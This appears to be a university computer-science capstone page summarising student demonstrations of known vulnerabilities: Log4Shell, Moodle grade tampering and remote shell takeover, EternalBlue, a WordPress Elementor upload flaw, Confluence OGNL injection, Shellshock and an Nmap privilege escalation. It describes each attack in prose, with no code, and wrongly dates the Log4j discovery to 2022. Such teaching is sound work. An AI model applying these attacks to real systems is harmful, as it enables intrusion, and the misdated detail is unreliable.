Winter 2023 CS Comps
Exploiting Security Vulnerabilities
Apache Log4J in 2 Minutes
CVE-2021-44228
Apache Log4J
A zero-day vulnerability discovered in 2022 in the Apache Log4j that allows easy-to-exploit remote code execution in Java applications. Log4J is a popular Java-based logging utility widely used for generating log messages. An attacker can exploit CVE-2021-44228 by sending a specially crafted log message to a vulnerable application that uses Log4J.
CVE-2020–25627, CVE-2020–14321,
CVE-2020–25629, CVE-2019-11631
Moodle
Moodle is our course management system. Here we demonstrated four vulnerabilities on Moodle 3.9, released on 5 June 2020, along with three opportunities you've missed if you are a senior/junior:
1: Log in as a teacher and change your grades
2: Become a site manager
3: Taking over the system with a remote shell
Taking Over Moodle Demo
Windows 7 Eternal Blue Demo
CVE-2017-0144
Windows 7 EternalBlue
EternalBlue is a Windows exploit created by the National Security Agency (NSA) of the United States. NSA analysts spent a year hunting for a bug in Microsoft’s software, and developed EternalBlue as part of their cyber-arsenal stockpile for (ostensibly) counterterrorism missions. In April 2017, the Shadow Brokers hacking group leaked it. It uses a flaw in the Microsoft implementation of the SMB Protocol, which allows remote attackers to execute arbitrary code on a target system by sending crafted messages to the SMBv1 server
CVE-2022-1329
WordPress
WordPress is a commonly used website builder with many third-party plugins available for download to extend functionality. One of them, the Elementor plugin (versions 6.0.0 - 6.3.0), handles AJAX requests insecurely, which can result in the upload and execution of a .zip file containing any code as long as the labels and headers appear correct.
Wordpress Elementor Plugin Demo
Confluence ONGL Injection in 2 Minutes
CVE 2022-26134
Confluence
CVE-2022-26134 was a zero-day OGNL injection vulnerability discovered in the Atlassian Confluence Server and Data Center software. Confluence is a widely used collaboration and documentation tool (basically a wiki for your team).
The vulnerability allows arbitrary remote code execution on a targeted server.
CVE-2014-6271
Shellshock
Bash is the default Unix shell for most Linux distributions. Shellshock is a Bash vulnerability first discovered in 2014—but the software has been vulnerable since 1989. Typical Shellshock exploits attempt remote command execution by telling Bash to assign an empty function declaration to an environment variable
Shellshock Demo with Captions
Andriod NMap Exploit Demo
CVE-2014-2630
Android NMap
NMap is a very common utility for network discovery and security auditing. When installed with high privilege levels it can create exploitable issues within linux kernel systems such as Android. Once a low level shell has been obtained, attackers can use this exploit to escalate their privileges to those NMap has, often resulting in root access.